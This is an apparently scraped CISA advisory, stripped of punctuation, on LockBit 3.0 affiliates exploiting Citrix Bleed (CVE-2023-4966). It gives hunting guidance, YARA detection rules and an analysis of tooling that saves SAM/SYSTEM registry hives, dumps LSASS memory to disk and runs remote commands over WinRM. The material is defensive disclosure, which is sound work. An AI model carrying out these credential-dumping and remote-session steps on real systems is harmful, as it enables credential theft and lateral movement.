TitleppIDppUseppModify Authentication Process Multifactor AuthenticationppT1556006ppThreat actors leverage vulnerabilities found within CVE to compromise modify andor bypass multifactor authentication to hijack user sessions harvest credentials and move laterally which enables persistent accessppSteal Web Session CookieppT1539ppThreat actors with access to valid cookies can establish an authenticated session within the NetScaler appliance without a username password or access to multifactor authentication MFA tokensppNetwork defenders should prioritize observing users in session when hunting for network anomalies This will aid the hunt for suspicious activity such as installing tools on the system eg putty rClone new account creation log item failure or running commands such as hostname quser whoami net and taskkill Rotating credentials for identities provisioned for accessing resources via a vulnerable NetScaler ADC or Gateway appliance can also aid in detectionppFor IP addressesppNote MFA to NetScaler will not operate as intended due to the attacker bypassing authentication by providing a tokensession for an already authenticated userppThe following procedures can help identify potential exploitation of CVE20234966 and LockBit 30 activityppBelow are CISA developed YARA rules and an opensource rule that may be used to detect malicious activity in the Citrix NetScaler ADC and Gateway software environment For more information on detecting suspicious activity within NetScaler logs or additional resources visit CISAs Malware Analysis Report MAR MAR104789151v1 Citrix Bleed or the resource section of this CSA 3ppCISA received four files for analysis that show files being used to save registry hives dump the Local Security Authority Subsystem Service LSASS process memory to disk and attempt to establish sessions via Windows Remote Management WinRM The files includeppThis file is a Windows batch file called abat that is used to execute the file called aexe with the file called adll as an argument The output is printed to a file named ztxt located in the path CWindowsTasks Next abat pings the loop back internet protocol IP address 127001 three timesppThe next command it runs is reg save to save the HKLMSYSTEM registry hive into the CWindowstasksem directory Again abat pings the loop back address 127001 one time before executing another reg save command and saves the HKLMSAM registry hive into the CWindowsTaskam directory Next abat runs three makecab commands to create three cabinet cab files from the previously mentioned saved registry hives and one file named CUsersPublicapng The names of the cab files are as followspprule CISA1047891502 trojan installsothercomponents
meta
author CISA Code Media Analysis
incident 10478915
date 20231106
lastmodified 202311081500
actor na
family na
capabilities installsothercomponents
malwaretype trojan
tooltype unknown
description Detects trojan PE32 samples
sha256 e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068
strings
s1 57 72 69 74 65 46 69 6c 65
s2 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64
s3 6f 70 65 72 61 74 6f 72 20 63 6f 5f 61 77 61 69 74
s4 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72
s5 64 65 6c 65 74 65 5b 5d
s6 4e 41 4e 28 49 4e 44 29
condition
uint160 0x5a4d and peimphash 6e8ca501c45a9b85fff2378cffaa24b2 and pesizeofcode 84480 and all of
them
ppThis file is a 64bit Windows commandline executable called aexe that is executed by abat This file issues the remote procedure call RPC ncalrpclsasspirpc to the RPC end point to provide a file path to the LSASS on the infected machine Once the file path is returned the malware loads the accompanying DLL file called adll into the running LSASS process If the DLL is correctly loaded then the malware outputs the message success in the consolepprule CISA1047891503 trojan stealsauthenticationcredentials credentialexploitation
meta
author CISA Code Media Analysis
incident 10478915
date 20231106
lastmodified 202311081500
actor na
family na
capabilities stealsauthenticationcredentials
malwaretype trojan
tooltype credentialexploitation
description Detects trojan DLL samples
sha256 17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994
strings
s1 64 65 6c 65 74 65
s2 3c 2f 74 72 75 73 74 49 6e 66 6f 3e
s3 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28
s4 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 45 78
s5 46 69 6e 64 46 69 72 73 74 46 69 6c 65 45 78 57
s6 47 65 74 54 69 63 6b 43 6f 75 6e 74
condition
uint160 0x5a4d and pesubsystem peSUBSYSTEMWINDOWSCUI and pesizeofcode 56832 and all of
them
ppThis file is a 64bit Windows DLL called adll that is executed by abat as a parameter for the file aexe The file aexe loads this file into the running LSASS process on the infected machine The file adll calls the Windows API CreateFileW to create a file called apng in the path CUsersPublicppNext adll loads DbgCoredll then utilizes MiniDumpWriteDump function to dump LSASS process memory to disk If successful the dumped process memory is written to apng Once this is complete the file abat specifies that the file apng is used to create the cabinet file called acab in the path CWindowsTaskspprule CISA1047891504 backdoor communicateswithc2 remoteaccess
meta
author CISA Code Media Analysis
incident 10478915
date 20231106
lastmodified 202311081500
actor na
family na
capabilities communicateswithc2
malwaretype backdoor
tooltype remoteaccess
description Detects trojan python samples
sha256 906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6
strings
s1 70 6f 72 74 20 3d 20 34 34 33 20 69 66 20 22 68 74 74 70 73 22
s2 6b 77 61 72 67 73 2e 67 65 74 28 22 68 61 73 68 70 61 73 73 77 64 22 29 3a
s3 77 69 6e 72 6d 2e 53 65 73 73 69 6f 6e 20 62 61 73 69 63 20 65 72 72 6f 72
s4 57 69 6e 64 77 6f 73 63 6d 64 2e 72 75 6e 5f 63 6d 64 28 73 74 72 28 63 6d 64 29 29
condition
all of them
ppThis file is a Python script called apy that attempts to leverage WinRM to establish a session The script attempts to authenticate to the remote machine using NT LAN Manager NTLM if the keyword hashpasswd is present If the keyword hashpasswd is not present then the script attempts to authenticate using basic authentication Once a WinRM session is established with the remote machine the script has the ability to execute command line arguments on the remote machine If there is no command specified then a default command of whoami is runppOrganizations are encouraged to assess Citrix software and your systems for evidence of compromise and to hunt for malicious activity see Additional Resources sectionIf compromise is suspected or detected organizations should assume that threat actors hold full administrative access and can perform all tasks associated with the web management software as well as installing malicious codeppIf a potential compromise is detected organizations shouldppThese mitigations apply to all critical infrastructure organizations and network defenders using Citrix NetScaler ADC and Gateway software CISA and authoring organizations recommend that software manufacturers incorporate securebydesign and default principles and tactics into their software development practices to limit the impact of exploitation such as threat actors leveraging unpatched vulnerabilities within Citrix NetScaler appliances which strengthens the security posture of their customersppFor more information on secure by design see CISAs Secure by Design and Default webpage and joint guideppThe authoring organizations of this CSA recommend organizations implement the mitigations below to improve your cybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise associated with Citrix CVE 20234966 and LockBit 30 ransomware ransomware affiliates These mitigations align with the CrossSector Cybersecurity performance goals CPGs developed by CISA and the National Institute of Standards and Technology NIST The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats tactics techniques and procedures Visit CISAs CrossSector Cybersecurity Performance Goals for more information on the CPGs including additional recommended baseline protectionsppIn addition to applying mitigations CISA recommends exercising testing and validating your organizations security program against the threat behaviors mapped to the MITRE ATTCK for Enterprise framework in this advisory CISA recommends testing your existing security controls inventory to assess how they perform against the ATTCK techniques described in this advisoryppTo get startedppCISA and the authoring organizations recommend continually testing your security program at scale in a production environment to ensure optimal performance against the MITRE ATTCK techniques identified in this advisoryppThe FBI is seeking any information that can be shared to include boundary logs showing communication to and from foreign IP addresses a sample ransom note communications with LockBit 30 affiliates Bitcoin wallet information decryptor files andor a benign sample of an encrypted file The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered Furthermore payment may also embolden adversaries to target additional organizations encourage other criminal actors to engage in the distribution of ransomware andor fund illicit activities Regardless of whether you or your organization have decided to pay the ransom the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center IC3 at ic3gov local FBI Field Office or CISA via the agencys Incident Reporting System or its 247 Operations Center at reportcisagov or 888 2820870ppAustralian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ASDs ACSC via 1300 CYBER1 1300 292 371 or by submitting a report to cybergovauppThe information in this report is being provided as is for informational purposes only CISA and authoring organizations do not endorse any commercial entity product company or service including any entities products or services linked within this document Any reference to specific commercial entities products processes or services by service mark trademark manufacturer or otherwise does not constitute or imply endorsement recommendation or favoring by CISA and the authoring organizationsppBoeing contributed to this CSApp1 NetScaler ADC and NetScaler Gateway Security Bulletin for CVE20234966
2 What is Mshta How Can it Be Used and How to Protect Against it McAfee
3 Investigation of Session Hijacking via Citrix NetScaler ADC and Gateway Vulnerability CVE20234966pp ppNovember 21 2023 Initial versionpp pp ppThis product is provided subject to this Notification and this Privacy Use policyppWe recently updated our anonymous product survey wed welcome your feedbackp
